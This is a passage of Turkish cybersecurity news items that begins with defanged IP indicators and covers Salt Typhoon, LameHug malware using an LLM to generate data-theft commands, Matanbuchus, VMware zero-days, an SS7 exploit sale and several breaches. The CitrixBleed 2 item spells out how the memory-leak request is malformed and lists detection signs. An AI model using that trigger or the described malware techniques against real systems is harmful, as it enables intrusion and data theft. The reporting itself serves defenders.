43.254.132[.]118, 146.70.24[.]144, 176.111.218[.]190, 113.161.16[.]130, 23.146.242[.]131, 58.247.195[.]208

Grubun daha önce siyasi kampanyaları ve yasa koyucuları hedef alan telekom altyapılarına sızarak iletişimleri izlediği ve bu süreçte JumblePath ve GhostSpider adlı özel yazılımlar kullandığı da biliniyor.

DHS’den önlem çağrısı
İç Güvenlik Bakanlığı, federal ve eyalet düzeyindeki siber güvenlik ekiplerine şu önlemleri almaları çağrısında bulundu:

• İlgili açıkların kapatılması,
• Gereksiz servislerin devre dışı bırakılması,
• SMB trafiğinin segmentasyonu,
• SMB imzalamanın zorunlu kılınması,
• Erişim kontrollerinin sıkılaştırılması.

Ulusal Muhafız Bürosu, ihlali doğruladı ancak hangi eyaletin etkilendiği veya olayın operasyonlara etkisi hakkında ayrıntı paylaşmadı. Çin’in Washington Büyükelçiliği ise saldırıyı doğrudan reddetmedi ancak Salt Typhoon’un Çin devletiyle bağlantılı olduğuna dair “kesin ve güvenilir bir kanıt” sunulmadığını savundu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kripto para borsası BigONE, 16 Temmuz 2025’te gerçekleşen bir siber saldırı sonucu yaklaşık 27 milyon dolar değerinde dijital varlığın çalındığını duyurdu. Şirket tarafından yapılan açıklamada, kullanıcıların kişisel verileri ve özel anahtarlarının bu saldırıdan etkilenmediği belirtildi.

BigONE, saldırının erken saatlerinde platform üzerindeki bazı varlıklarda olağandışı hareketler tespit edildiğini ve yapılan inceleme sonucunda bunun üçüncü taraf kaynaklı bir saldırı olduğunun belirlendiğini bildirdi. Saldırıdan yalnızca sıcak cüzdan sisteminin etkilendiği açıklandı.

Zarar kullanıcıya yansıtılmayacak
Şirket, yaşanan kaybın platform rezervlerinden karşılanacağını ve hiçbir kullanıcının zarar görmeyeceğini belirtti:
“BigONE, bu olaydan doğan tüm kayıpları tamamen karşılayacaktır. Kullanıcı varlıkları üzerinde maddi bir etki oluşmayacaktır.”

Tedarik zinciri saldırısı ihtimali
Siber güvenlik firması SlowMist ile iş birliği yapan BigONE, saldırının izini blockchain üzerinde sürmeye başladığını duyurdu. Ancak saldırının teknik detayları henüz kamuoyuyla paylaşılmadı. SlowMist yetkilileri, olayın bir tedarik zinciri saldırısı olabileceğini öne sürdü.

Blockchain analiz platformu Lookonchain, saldırganların çalınan dijital varlıkları hızla dönüştürdüğünü ve bunların 120 Bitcoin, 1.272 Ether, 2.625 Solana ve 23,3 milyon Tron'a çevrildiğini bildirdi.

Sektörel etkiler ve yorumlar
Blockchain suç araştırmacısı ZachXBT, olayla ilgili yaptığı değerlendirmede, BigONE’un geçmişte dolandırıcılık kaynaklı kripto paraların işlendiği bir platform olarak da bilindiğine dikkat çekerek, bu tür saldırıların kripto ekosisteminde doğal bir “temizlenme” sürecini tetikleyebileceğini ifade etti.

2025’te kripto hırsızlıkları rekor kırdı
Olay, kripto sektöründe yaşanan genel artışın ortasında gerçekleşti. Chainalysis tarafından yayımlanan 2025 yıl ortası raporuna göre, bu yıl şimdiye kadar 2,17 milyar dolarlık kripto varlık çalındı. Bu rakam, 2024 yılının tamamında gerçekleşen kayıpların üzerine çıkmış durumda.

Raporda, Kuzey Kore bağlantılı aktörlerin ByBit borsasından yapılan 1,5 milyar dolarlık saldırıyla bu yılın en büyük faillerinden biri haline geldiği vurgulandı. Ayrıca kişisel cüzdanlara yönelik saldırıların da artışta olduğu ve toplam kaybın %23,35’ini oluşturduğu belirtildi.

Chainalysis ayrıca kripto hırsızlıklarında fiziksel şiddet olaylarının da arttığını ve bunun Bitcoin fiyatlarındaki yükselişle bağlantılı olabileceğini bildirdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ukrayna Ulusal Siber Olay Müdahale Ekibi (CERT-UA), yapay zekâ destekli komutlar kullanarak Windows sistemlerinde veri hırsızlığı gerçekleştiren yeni bir zararlı yazılım ailesi olan LameHug’u keşfetti. Python ile yazılan zararlı yazılım, Alibaba Cloud tarafından geliştirilen Qwen 2.5-Coder-32B-Instruct adlı açık kaynaklı büyük dil modeli (LLM) ile entegre çalışıyor.

CERT-UA, 10 Temmuz 2025 tarihinde hükümet kurumlarına gönderilen sahte e-postalar üzerinden yürütülen saldırılar hakkında aldığı ihbarlar sonrasında LameHug’u tespit etti. Saldırılarda, Ukrayna hükümet yetkilileri gibi davranan saldırganlar, hedeflere zararlı yazılım içeren ZIP dosyaları gönderdi. Bu eklentiler arasında “Attachment.pif”, “AI_generator_uncensored_Canvas_PRO_v0.9.exe” ve “image.py” isimli yükleyiciler yer aldı.

Komutlar yapay zekâ tarafından oluşturuluyor
LameHug’un en dikkat çekici özelliği, sabit kodlu komutlar yerine, Hugging Face platformu aracılığıyla LLM modeli kullanarak dinamik olarak sistem keşif ve veri toplama komutları üretmesi. Yapay zekâya gönderilen doğal dil girdileri sonucunda elde edilen komutlar, hedef sistemde çalıştırılarak:

• Sistem bilgileri info.txt adlı bir dosyada toplanıyor,

• Kullanıcının “Documents”, “Desktop” ve “Downloads” klasörlerinde belge araması yapılıyor,

• Elde edilen veriler SFTP veya HTTP POST yoluyla dış sunuculara iletiliyor.

Bu yöntem, zararlı yazılımın yeni komutlar veya güncellemeler almadan saldırı senaryolarını olay anında değiştirebilmesini sağlıyor. Aynı zamanda sabit komutları arayan antivirüs çözümlerini atlatmayı da kolaylaştırıyor.

Saldırılar APT28 grubuna atfedildi
CERT-UA, bu faaliyetleri Rusya devlet destekli APT28 grubu ile orta düzeyde güvenilirlikle ilişkilendiriyor. APT28, daha önce Sednit, Fancy Bear, STRONTIUM ve Pawn Storm gibi isimlerle de bilinen köklü bir tehdit aktörü olarak tanınıyor.

Yeni bir siber saldırı paradigması olabilir
LameHug, kamuya açık olarak belgelenmiş ilk LLM destekli zararlı yazılım olma özelliğini taşıyor. Uzmanlara göre bu tür saldırılar, tehdit aktörlerinin daha esnek, dinamik ve tespit edilmesi zor siber operasyonlar yürütmesine imkân tanıyor. Ayrıca Hugging Face gibi meşru altyapılar kullanılarak komut ve kontrol iletişimi daha gizli hale getiriliyor.

CERT-UA, yapay zekâ modeli tarafından oluşturulan komutların sistemde başarıyla çalıştırılıp çalıştırılamadığına dair net bir bilgi paylaşmadı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Google, dünya çapında 10 milyondan fazla Android cihazı etkileyen BadBox 2.0 botnet operasyonunu durdurmak amacıyla ABD'de dava açtı. Şirket, failleri belirlenemeyen siber suçluları, reklam platformlarına yönelik organize dolandırıcılık faaliyeti yürütmekle suçluyor.

BadBox 2.0, Android Open Source Project (AOSP) tabanlı cihazlarda çalışan bir zararlı yazılım ağı. Saldırganlar, düşük maliyetli AOSP cihazları (akıllı TV’ler, medya kutuları, vb.) satın alarak işletim sistemini değiştiriyor ve BadBox 2.0 zararlısını yüklü şekilde yeniden satışa sunuyor. Ayrıca kullanıcılar, zararlı yazılım içeren uygulamaları indirerek de farkında olmadan cihazlarını enfekte edebiliyor.

Zararlı yazılım, cihazlara kurulduktan sonra saldırganların kontrolündeki komut sunucularına (C2) bağlanıyor ve verilen komutları çalıştırarak cihazı bir botnete dahil ediyor. Enfekte cihazlar ya siber suçlulara vekil internet erişimi (residential proxy) olarak satılıyor ya da reklam dolandırıcılığı amacıyla kullanılıyor.

Reklam dolandırıcılığı üç aşamalı yürütülüyor:

1. Gizli reklam görüntüleme: Kötü niyetli kopya uygulamalar (evil twin apps) arka planda sessizce Google reklamlarını yüklüyor.

2. Web tabanlı oyun dolandırıcılığı: Cihazlar, görünmeyen tarayıcılar üzerinden otomatik olarak oyun sitelerini çalıştırıp reklam gösterimlerini artırıyor.

3. Arama tıklama dolandırıcılığı: Cihazlar, reklam içeren sahte arama sonuçlarını tetikleyerek tıklama başına gelir elde eden yayıncı hesaplarına para kazandırıyor.

Google, New York eyaletinde 170.000'den fazla cihazın enfekte olduğunu ve platformlarına bağlı binlerce yayıncı hesabının devre dışı bırakıldığını açıkladı. Ancak şirket, ağın halen aktif olduğunu ve hızla büyüdüğünü belirtiyor.

Google’ın mahkemeye sunduğu şikayette, botnetin 2024 sonunda Almanya'nın DNS sorgularını sinkhole yöntemiyle keserek orijinal BadBox ağını durdurduğu ancak saldırganların bu engeli aşarak BadBox 2.0 sürümünü yayına aldıkları ifade ediliyor. Şirket, bu ağın durdurulmazsa daha fazla cihaza bulaşarak yeni zararlı yazılımlar üretmeye devam edeceğini ve kendilerinin her yıl büyük miktarda kaynak harcamak zorunda kalacağını belirtiyor.

RICO ve CFAA kapsamında dava
Google, faillerin Çin'de ikamet ettiğini düşündüğü için kimlikleri tespit edilemeyen bu kişilere karşı ABD Bilişim Suçları Yasası (CFAA) ve Organize Suçlarla Mücadele Yasası (RICO) kapsamında dava açtı. Şirket, zararın tazmini ve botnet altyapısının kalıcı olarak devre dışı bırakılmasını talep ediyor.

Dava dosyasında, siber suç operasyonuna ait olduğu tespit edilen 100’den fazla alan adı da yer alıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Microsoft Teams platformu, son dönemde Matanbuchus adlı zararlı yazılımın dağıtımı için sosyal mühendislik saldırılarında kullanılmaya başlandı. Zararlı yazılım, sahte BT destek personeli gibi davranan saldırganlar tarafından yapılan Teams sesli aramaları aracılığıyla hedef sistemlere yükleniyor.

Matanbuchus, ilk olarak 2021 yılında karanlık ağda tanıtılan bir malware-as-a-service (MaaS) hizmeti olarak dikkat çekmişti. Windows sistemlerinde çalışan bu zararlı yazılım, yüklediği kötü amaçlı bileşenleri doğrudan bellekte çalıştırarak antivirüs yazılımlarının tespitinden kaçabiliyor. Yazılım, daha önce 2022 yılında büyük çaplı bir spam kampanyasında Cobalt Strike bileşenlerini dağıtmak için kullanılmıştı.

Sahte BT çağrılarıyla sistemlere sızılıyor
Morphisec adlı güvenlik firmasına göre, Matanbuchus'un yeni sürümü olan 3.0 versiyonunda Microsoft Teams üzerinden saldırılar daha yaygın hale geldi. Saldırganlar, hedef kullanıcıya harici bir Teams çağrısı başlatarak kendilerini BT destek personeli gibi tanıtıyor. Ardından, hedef kullanıcıdan Windows’un yerleşik uzaktan yardım aracı olan Quick Assist’i başlatması isteniyor.

Quick Assist üzerinden erişim sağlandıktan sonra kullanıcıdan bir PowerShell komutu çalıştırması isteniyor. Bu komut, üç dosya içeren bir ZIP arşivini indirip çıkararak, DLL side-loading yöntemiyle Matanbuchus zararlısının yüklenmesini sağlıyor.

Gelişmiş gizlenme yöntemleri
Matanbuchus 3.0 sürümü, önceki versiyonlara kıyasla daha gelişmiş gizlenme ve tespit önleme özellikleri içeriyor. Komut ve kontrol iletişimi RC4 yerine Salsa20 algoritmasıyla sağlanıyor. Zararlı yazılım, yalnızca belirli bölge ve sistemlerde çalışmak üzere anti-sandbox kontrolleri uyguluyor.

Windows API çağrıları yerine doğrudan syscall’lar aracılığıyla işlem yapan zararlı, güvenlik yazılımlarını atlatmayı hedefliyor. Bu işlemler, analizden kaçmak için MurmurHash3 adlı non-kriptografik özetleme algoritmasıyla gizleniyor.

Zararlı yazılımın sistemde çalıştıktan sonraki yetenekleri arasında, PowerShell, CMD, EXE, DLL, MSI ve shellcode dosyalarını çalıştırabilme, kullanıcı bilgilerini toplama ve güvenlik yazılımlarını tespit ederek saldırı yöntemini buna göre ayarlama yer alıyor.

Tehdit analizi ve uyarılar
Morphisec tarafından yapılan teknik analizde, Matanbuchus’un önemli ölçüde gelişmiş bir tehdit haline geldiği belirtiliyor. Şirket, zararlı yazılım örnekleri ve kullanıldığı alan adlarını içeren istismar göstergelerini (IOC) kamuoyuyla paylaştı.

Geçmişte de DarkGate zararlısının Microsoft Teams üzerinden benzer yollarla dağıtıldığı ve dış erişim ayarları zayıf olan kuruluşların hedef alındığı biliniyor. Microsoft Teams’in sosyal mühendislik saldırılarında kullanımının artması, özellikle dış kaynaklı erişim ayarlarının gözden geçirilmesini gerekli kılıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

VMware, sanallaştırma ürünlerini etkileyen ve Pwn2Own Berlin 2025 yarışmasında istismar edilen dört sıfır gün açığına yönelik güvenlik güncellemeleri yayımladı. Güncellemeler VMware ESXi, Workstation, Fusion ve Tools yazılımlarını kapsıyor.

Söz konusu açıkların üçü, saldırganların sanal makineden ana sisteme geçerek komut çalıştırmasına olanak tanıyan yüksek önemdeki zafiyetler olarak tanımlanıyor. Bu açıklar şu şekilde listelendi:

• CVE-2025-41236: VMXNET3 sanal ağ adaptöründe bulunan tamsayı taşması açığı. Bu zafiyet, STARLabs SG’den Nguyen Hoang Thach tarafından kullanıldı.

• CVE-2025-41237: VMCI (Virtual Machine Communication Interface) bileşeninde tamsayı alt taşması sonucu oluşan out-of-bounds yazma hatası. Açık, REverse Tactics’ten Corentin Bayet tarafından istismar edildi.

• CVE-2025-41238: PVSCSI (Paravirtualized SCSI) kontrolcüsünde bulunan heap overflow zafiyeti. Bu açık, Synacktiv’ten Thomas Bouzerar ve Etienne Helluy-Lafont tarafından kullanıldı.

Bu üç zafiyetin her biri 9.3 CVSS puanına sahip.

Bilgi sızdırma açığı da kapatıldı
Dördüncü açık olan CVE-2025-41239, bilgi sızdırılmasına neden olabilecek bir zafiyet olarak tanımlandı ve 7.1 şiddet puanı aldı. Bu açık da Corentin Bayet tarafından tespit edildi ve CVE-2025-41237 ile zincirleme kullanıldı.

Yama dışında çözüm bulunmuyor
VMware, bu güvenlik açıkları için herhangi bir geçici çözüm (workaround) sunmadığını açıkladı. Bu nedenle kullanıcıların ve kurumların sistemlerini koruyabilmesi için en son sürümlere güncelleme yapmaları gerekiyor. Özellikle CVE-2025-41239’un VMware Tools for Windows ürününü etkilediği ve farklı bir güncelleme yöntemi gerektirdiği belirtildi.

Açıkların tamamı, Mayıs 2025’te gerçekleştirilen Pwn2Own Berlin yarışmasında gösterildi. Etkinlikte güvenlik araştırmacıları toplam 29 sıfır gün açığı ortaya koyarak 1.078.750 dolar ödül kazandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Citrix NetScaler ürünlerini etkileyen ve "CitrixBleed 2" olarak adlandırılan kritik güvenlik açığı CVE-2025-5777’nin, kamuya açık istismar kodları paylaşılmadan önce siber saldırganlar tarafından hedefli biçimde kullanıldığı tespit edildi.

Siber güvenlik firması GreyNoise, 23 Haziran 2025 tarihinde honeypot sistemlerinin bu açığın hedef alındığı saldırıları algıladığını duyurdu. Bu tarih, kamuya açık ilk proof-of-concept (PoC) kodunun yayınlandığı 4 Temmuz’dan yaklaşık iki hafta öncesine denk geliyor.

GreyNoise, 7 Temmuz’da açığı takip etmek için özel bir etiket oluşturduğunu ve bu etiket sayesinde geçmiş verilerdeki saldırı girişimlerinin de görünür hale geldiğini bildirdi. Şirket ayrıca, ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı’na (CISA) 9 Temmuz’da açığın aktif olarak kullanıldığını teyit etti. Bunun üzerine CISA, CVE-2025-5777’yi bilinen istismar edilen güvenlik açıkları (KEV) listesine ekleyerek federal kurumlara bir gün içinde yama uygulanması talimatı verdi.

Citrix sessiz kaldı
GreyNoise tarafından sağlanan istismar kodlarıyla yapılan doğrulamalara göre, saldırılar doğrudan CitrixBleed 2 açığını hedef alıyordu. Ancak Citrix, bu saldırılara ilişkin kamuoyunu zamanında bilgilendirmedi. Güvenlik araştırmacısı Kevin Beaumont’un defalarca yaptığı uyarılara rağmen, şirket 26 Haziran’da yayınladığı güvenlik blog yazısını 11 Temmuz’a kadar sessizce güncelledi ve saldırıların varlığını doğrudan kabul etmedi.

Citrix, 15 Temmuz’da NetScaler sistemlerinde güvenlik ihlali belirtilerinin nasıl tespit edileceğine ilişkin yeni bir blog gönderisi yayınladı. Buna karşın, bazı araştırmacılar, şirketin istismar göstergelerini (IOC) kendileriyle paylaşıldığı halde açıklamadığını ve şeffaf davranmadığını öne sürüyor.

Açığın teknik detayları
CitrixBleed 2, NetScaler sistemlerinde oturum açma işlemleri sırasında yetersiz giriş doğrulaması nedeniyle ortaya çıkan bir bellek aşımı açığı olarak tanımlanıyor. Saldırganlar, "login=" parametresinde eşittir işareti kullanmadan gönderilen POST istekleriyle cihazdan 127 baytlık bellek verisini dışarı sızdırabiliyor. Horizon3 ve WatchTowr araştırmacıları, bu yöntemin geçerli oturum anahtarlarının ele geçirilmesi için kullanılabildiğini, böylece saldırganların yetkisiz erişim sağlayabileceğini gösterdi.

Kevin Beaumont, "/doAuthentication.do" yoluna yapılan tekrar eden POST isteklerinin ve "Content-Length: 5" başlığı içeren isteklerin istismar belirtileri olabileceğini belirtti. Ayrıca, kullanıcı adı alanında olağandışı karakterler (örneğin "#") içeren oturum sonlandırmaları da dikkat çekici bulgular arasında yer alıyor.

Citrix’in önerileri yetersiz kaldı
Citrix, istismar edilen oturumların sonlandırılması için ICA ve PCoIP oturumlarının kill komutlarıyla sonlandırılmasını önerdi. Ancak Beaumont, bu yaklaşımın yetersiz olduğunu, SSH, Telnet, RDP ve AAA oturumlarının da ayrı ayrı sonlandırılması gerektiğini ifade etti. Ayrıca sistem yöneticilerine, oturumlar sonlandırılmadan önce olağandışı IP adres değişiklikleri veya yetkisiz kullanıcı girişleri açısından günlük kayıtlarını incelemeleri önerildi.

Tespit ve yayılma durumu
Beaumont’a göre, açık 20 Haziran’dan itibaren kullanılmaya başlandı ve takip eden günlerde yaygınlaştı. Araştırmacı, saldırıların dikkatle seçilmiş hedeflere yönelik olduğunu ve saldırganların NetScaler cihazlarını doğrulamak için profil oluşturduklarını ifade etti.

Öte yandan, Imperva tarafından yapılan açıklamaya göre, ürünleri 11,5 milyonun üzerinde istismar girişimi tespit etti. Bu saldırıların yaklaşık %40’ı finans sektörünü hedef aldı.

Citrix, NetScaler ADC ve Gateway için güvenlik yamaları yayınladı ve kullanıcıların desteklenen sürümlere acilen geçmeleri gerektiğini duyurdu. 12.1 ve 13.0 gibi destek dışı sürümler için herhangi bir geçici çözüm bulunmuyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber güvenlik ve açık kaynak istihbarat alanlarında çalışmalar yürüten Doğukan Çalışkan, yeni geliştirdikleri IntelSonar adlı coğrafi konum belirleme sistemini duyurdu. Görüntü işleme ve yapay zeka teknolojileriyle hazırlanan sistem, sadece görsel içerik üzerinden, ek bir veri veya kullanıcı girişi gerektirmeden fotoğrafların çekildiği koordinatları tespit edebiliyor.

Çalışkan'ın açıklamasına göre, IntelSonar özellikle EXIF verisi bulunmayan, bulanık veya referans noktası içermeyen görüntülerde dahi yüksek doğruluk oranı sağlıyor. Sistem, büyük ölçekli coğrafi veri kümeleriyle eğitilmiş derin öğrenme motoru sayesinde, arazi yapısı, bitki örtüsü, kentsel doku, gölge ve ışık yönü gibi unsurları analiz ederek konum tahmini yapabiliyor.

Yapılan son testlerde IntelSonar, çöl ve kentsel sınır bölgeleri gibi zorlu alanlarda %92'nin üzerinde doğruluk oranına ulaştı. Çalışkan, sistemin askeri ve savunma amaçlı durum tespitinden insani yardım koordinasyonuna, afet haritalandırmadan medya ve çatışma doğrulama süreçlerine kadar birçok alanda kullanılabileceğini belirtti.

Henüz kapalı test aşamasında olan IntelSonar'ın, önümüzdeki dönemde açık beta sürümünün duyurulması planlanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Fransa’daki Disneyland Paris’e ait son derece gizli mühendislik verileri ve projeler siber saldırı sonucu kamuya sızdırıldı. Toplamda 64 GB’lık veri arşivinde, parkın inşa sürecine dair çok sayıda doküman ve medya dosyası yer alıyor. Sızıntının, Disneyland Paris’in çeşitli tema bölgelerinde çalışan bir taşeron firmanın dijital sistemlerine yapılan izinsiz erişim sonucu gerçekleştiği öğrenildi.

Detaylı planlar sızdırıldı
Toplamda 39 bin dosyadan oluşan arşiv, Frozen, Pirates of the Caribbean, Phantom Manor ve Big Thunder Mountain gibi popüler alanlara ait detaylı mimari planları, mühendislik hesaplarını, jeolojik raporları ve güvenlik standartlarını içeriyor. Bu belgeler, parkın altyapısal güvenliği ve ticari sırları açısından kritik bilgiler barındırıyor.

Gizli görüntüler de dosyalar arasında
Sızdırılan belgeler arasında 4 binden fazla fotoğraf ve video bulunuyor. Bu görüntüler, Disneyland çalışanlarının gizlilik sözleşmeleriyle korunan alanlarda çekildiği tahmin edilen sahne arkası görüntülerden oluşuyor. Videolar ve fotoğraflar, eğlence parkının yapım aşamalarını gözler önüne seriyor.

Endüstriyel casusluk riski
Uzmanlar, bu tür büyük çaplı sızıntıların yalnızca marka güvenliğini değil, aynı zamanda eğlence parkı sektöründe faaliyet gösteren diğer firmalar için de ciddi bir casusluk fırsatı oluşturduğunu belirtiyor. Disneyland Paris yönetimi ise henüz resmi bir açıklama yapmadı.

Siber güvenlik uzmanlarının odağında
Olayla ilgili detaylara intelsonar platformu üzerinden erişilebiliyor. Yerli yazılımcılar tarafından geliştirilen bu platform, siber tehdit istihbaratı alanında öne çıkan güncel çözümlerden biri olarak dikkat çekiyor. IntelSonar, bu tür sızıntıların erken aşamada tespiti ve analizi konusunda önemli bir araç haline geldi.

Disneyland Paris'ten 64 GB'lık Dev Veri Sızıntısı: Gizli Planlar ve Mühendislik Belgeleri Ortaya Saçıldı

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dolandırıcılık ve yasa dışı bahis suçları ön planda
Operasyonlar, nitelikli dolandırıcılık, yasa dışı bahis, çevrimiçi çocuk müstehcenliği ve tacizi gibi suçlara yönelik olarak gerçekleştirildi. Şüphelilerin sosyal medya üzerinden ürün bedeli, dosya masrafı, vergi ücreti, araç kiralama ve kapora gibi bahanelerle vatandaşları dolandırdıkları tespit edildi. Ayrıca, bazı şüphelilerin yasa dışı bahis sitelerinde aktif görev aldığı ve bu sitelerle bağlantılı para transferlerine aracılık ettikleri de belirlendi.

Cumhuriyet Başsavcılıkları ve Emniyet birimleri koordineli çalıştı
Soruşturma süreci, Cumhuriyet Başsavcılıkları ile Emniyet Genel Müdürlüğü Siber Suçlarla Mücadele Daire Başkanlığı'nın koordinasyonunda yürütüldü. Erzurum, Konya, Eskişehir, Sakarya, Gaziantep, Ankara, Mersin, Burdur ve Kocaeli merkezli olmak üzere toplam 31 ilde gerçekleştirilen operasyonlara çok sayıda il emniyet müdürlüğü katıldı.

Suçlamalar ve ele geçirilenler
Yakalanan şüpheliler hakkında 'nitelikli dolandırıcılık', 'yasa dışı bahis', 'suç işlemek amacıyla örgüt kurmak ve üye olmak', 'suçtan elde edilen mal varlığı değerlerini aklamak' ve 'bilişim sistemlerinin kullanılması suretiyle dolandırıcılık' suçlarından işlem başlatıldı. Operasyonlarda çok sayıda dijital materyal, ruhsatsız tabanca ve yaklaşık 15 milyon TL değerinde olduğu belirtilen 10 otomobile el konuldu.

Siber Vatan vurgusu
Yerlikaya, 'Kara Vatan’da olduğu gibi Siber Vatan’da da sanal devriyelerimizle suç ve suçlularla mücadelemize kararlılıkla devam ediyoruz' ifadelerini kullandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

SS7 nedir ve neden önemlidir?
SS7 (Sinyalizasyon Sistemi No.7), dünya genelindeki telefon operatörleri arasında arama başlatma, SMS yönlendirme ve dolaşım bilgisi paylaşımı gibi kritik işlemleri yürüten bir sinyal protokolüdür. Ancak bu sistemde yıllardır süregelen yapısal zafiyetler, özellikle konum takibi, çağrı yönlendirme ve kimlik doğrulama atlatma gibi saldırılara olanak tanımaktadır.

Doğukan Çalışkan kimdir?
Siber tehdit istihbaratı analisti ve exploit geliştiricisi Doğukan Çalışkan, söz konusu zafiyeti darkweb'de tespit etti. Çalışkan, alıcı kimliğiyle tehdit aktörüyle doğrudan iletişime geçti ve süreci teknik olarak kayıt altına aldı.

Darkweb'de SS7 açığı satışı
Haziran 2025'te darkweb forumlarında yapılan bir paylaşımda, bir tehdit aktörü SS7 açığını 5 bin dolara satışa sundu. Paylaşımda, açığın kullanıldığı bir cihaza ait ekran görüntüleri ve nmap taramaları da yer aldı. İlgili cihazda SIP (5060 portu) servisinin açık olduğu ve SS7 protokolünü işleyen servislerin bulunduğu gözlemlendi.

Alıcı gibi davranılarak temas kuruldu
Çalışkan, tehdit aktörüyle TOX mesajlaşma uygulaması üzerinden temasa geçti. İlk etapta doğrudan açık talep edilmedi; dolandırıcılık olup olmadığını anlamak için kanıt talebinde bulunuldu. Aktör, bir cihaz üzerinde SS7 ile ilgili trafiği gösteren verileri ve cihaz tarama sonuçlarını paylaştı.

Aktörün mesajlarında dikkat çeken bir ifade vardı: ‘Bu hala çalışan bir RCE’ye (uzaktan kod yürütme açığı) dönüştürülmeli’. Bu, satılan açığın ham haliyle teknik bir işlemci tarafından geliştirilmesi gerektiği anlamına geliyor.

Gösterilen teknik veriler neleri ortaya koyuyor?
Aktör, SIP portu açık olan cihazlar üzerinde çalışan bir Apache sunucusu olduğunu ve PHP tabanlı web uygulamasının hedef alındığını belirtti. Bu sistemlerde, CentOS üzerinde çalışan servislerin zafiyetleri tarandı ve bir RCE potansiyelinin bulunduğu iddia edildi.

Sunulan veriler arasında şunlar dikkat çekti:

• Wappalyzer analiz ekranı

• Nmap ile port tarama sonuçları

• sngrep ve ngrep ile izlenen SS7 trafiği

• Hedef cihazda çalışan servislerin detayları

Ayrıca aktör, Asterisk PBX için kimlik bilgilerine ulaşılabileceğini de dile getirdi. Bu, çağrı yönlendirme gibi işlemler üzerinde kontrol kurma imkânı doğurabilir.

Satış yöntemi ve emanet sistemi kullanımı
Satıcı, dolandırıcılık şüphesine karşı olarak yalnızca emanet sistemleri üzerinden çalışacağını belirtti. Bu tür sistemlerde, ödeme yapıldıktan sonra ürün doğrulanana kadar para emanet hesabında tutuluyor. Çalışkan, işlem öncesi kanıt talep ettiğinde, tehdit aktörü çeşitli teknik ekran görüntüleri sundu.

SS7 zafiyetlerinin potansiyel tehditleri
SS7 altyapısındaki zafiyetler, kötü niyetli kişiler tarafından şu amaçlarla kullanılabilir:

• SMS'lerin yeniden yönlendirilmesi

• Çağrıların gizlice dinlenmesi veya başka bir cihaza aktarılması

• Hedef kişinin anlık konumunun tespiti

• İki faktörlü kimlik doğrulamanın atlatılması

Ancak burada dikkat çeken en önemli unsur, aktörün bu açığı doğrudan çalışır hale getirmediği, yalnızca gerekli teknik altyapıyı sunduğudur. Bu durum, açığın nihai kullanımının daha gelişmiş gruplara bırakıldığını düşündürmektedir.

Kullanılan teknikler ve araçlar
Çalışkan'ın raporladığı olayda öne çıkan araç ve yöntemler şunlardır:

• Shodan, Fofa gibi arama motorları ile hedef belirleme

• nmap ile port tarama ve servis tespiti

• sngrep, ngrep ile SIP ve SS7 trafiği izleme

• Wappalyzer ile yazılım sürüm tespiti

• Web zafiyet analizi ve potansiyel RCE tespiti

Gelişmiş grupların radarında
Tehdit aktörünün de belirttiği gibi, bu tür açıklar genellikle teknik olmayan kullanıcılar için değil; fidye yazılımı grupları, gelişmiş sürekli tehdit (APT) ekipleri ve yasa dışı istihbarat ağları için hazırlanmış altyapıların temelini oluşturuyor.

SS7 açığı gibi altyapısal zafiyetler, sadece bireysel kullanıcıları değil; kurumsal sistemleri, kamu haberleşmesini ve kritik iletişim altyapılarını da hedef alabilir.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Google Reklamlarıyla Sahte Siteye Yönlendirme

Saldırganlar, Google reklamları üzerinden kullanıcıları gerçek DeepSeek platformunu taklit eden sahte sitelere çekiyor. Kullanıcılar "deepseek r1" araması yaptığında, reklam bağlantısı tuzak bir siteye yönlendiriliyor.

Sahte Uygulamalar ve Truva Atları Kullanılıyor

Sahte site, Windows işletim sistemi kullanıcılarını hedef alıyor ve kullanıcıya çevrim dışı çalışan Ollama veya LM Studio gibi araçları indirme imkanı sunuyor. İndirme işlemi sırasında CAPTCHA testi kullanılarak kullanıcı kandırılıyor ve ardından kötü amaçlı yazılım bilgisayara yükleniyor.

Windows Defender Koruması Atlatılıyor

Bu yazılım, Windows Defender'ın korumasını özel algoritmalarla aşarak sisteme yerleşiyor. Ancak yükleme, kullanıcının yönetici haklarına sahip olmasını gerektiriyor. Yönetici hakkı bulunmayan kullanıcıların sistemlerine bu zararlı yazılım bulaşamıyor.

Kullanıcı Verileri Tehlike Altında

'BrowserVenom' olarak adlandırılan zararlı yazılım, kullanıcının internet tarayıcılarını saldırganlar tarafından kontrol edilen bir proxy sunucusuna yönlendiriyor. Bu yöntemle kullanıcıların hassas tarayıcı verileri çalınıyor ve faaliyetleri sürekli izleniyor.

Uzmanlardan Siber Güvenlik Tavsiyeleri

Kaspersky uzmanları, kullanıcılara aşağıdaki önlemleri almalarını öneriyor:

• İnternet sitesi adreslerinin doğruluğunu kontrol etmek,

• Çevrim dışı yapay zeka araçlarını yalnızca resmi kaynaklardan indirmek,

• Windows’u yönetici ayrıcalıklarına sahip olmayan profillerde kullanmak,

• Güvenilir siber güvenlik çözümleri kullanmak.

Kaspersky Güvenlik Araştırmacısı Lisandro Ubiedo, yapay zeka uygulamalarının çevrim dışı kullanımının avantajlarına dikkat çekerken, doğru önlemler alınmadığında bu tür kötü amaçlı yazılımların ciddi tehdit oluşturabileceğini belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Soruşturma dosyasına giren bilgilere göre, Getir'de yazılım mühendisi olarak çalışan Ferhat Y., sadece 20 gün içinde 2 bin 890 kullanıcıya ait isim, soy isim, adres, telefon, e-posta, seyahat ve sipariş bilgilerini sistemden çekerek sosyal medya ve karanlık ağda paylaştı.

Şirket kurucusuna şantaj mesajları gönderdi
İddialara göre Ferhat Y., elde ettiği milyonlarca satırlık veriyi Getir ve BiTaksi'nin kurucusu Nazım Salur'a e-posta yoluyla tehdit amaçlı gönderdi. 'Nazım Bey' takma adıyla gönderilen mesajlarda verilerin üçüncü şahıslara ya da medyaya satılabileceği ima edildi.

